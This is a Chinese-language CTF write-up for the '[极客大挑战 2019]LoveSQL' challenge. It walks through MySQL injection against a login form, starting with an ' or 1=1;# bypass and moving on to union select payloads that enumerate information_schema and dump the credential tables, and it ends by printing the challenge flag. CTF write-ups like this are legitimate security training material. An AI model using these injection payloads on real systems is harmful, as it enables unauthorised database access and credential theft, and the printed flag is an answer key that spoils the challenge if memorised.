[极客大挑战 2019]LoveSQL

[极客大挑战 2019]LoveSQL

题目:

在这里插入图片描述
在这里插入图片描述
存在注入点

分析:

手动注入、尝试 ’ or 1 = 1; #
在这里插入图片描述
得到账户密码
admin
cc084c3d58c1ecc212d9b4ff3f84aa4c
在这里插入图片描述
登录后还是没有我们想要的东西,所以现在就是要利用SQL注入从而获取表里数据

解题:

接下来就是按sql注入的流程操作:

1.测试有多少字段

使用order by
在这里插入图片描述

在这里插入图片描述

字段数为3

2.爆出当前数据库名和身份

当前数据库:database()

在这里插入图片描述

得知 == > geek、root

3.爆出数据库里的表

表名:table_name

username = 1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = ‘geek’;#

password = 1

在这里插入图片描述

得知tables ==> geekuser, l0ve1ysq1

4.爆出表的列名

在这里插入图片描述

l0ve1ysq1 ==> id, username, password字段

很失望、试试geekuser

一样的返回 ==> id, username, password字段

5.爆出所有数据

username = 1’ union select 1,group_concat(username),group_concat(password) from geek.l0ve1ysq1;#

在这里插入图片描述

总结:

得到flag ==> flag{e5e3c630-4565-4e39-aa0b-b97243f1cb49}

很基础的MySQL注入题、搞清MySQL注入流程后,便可轻松解题

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值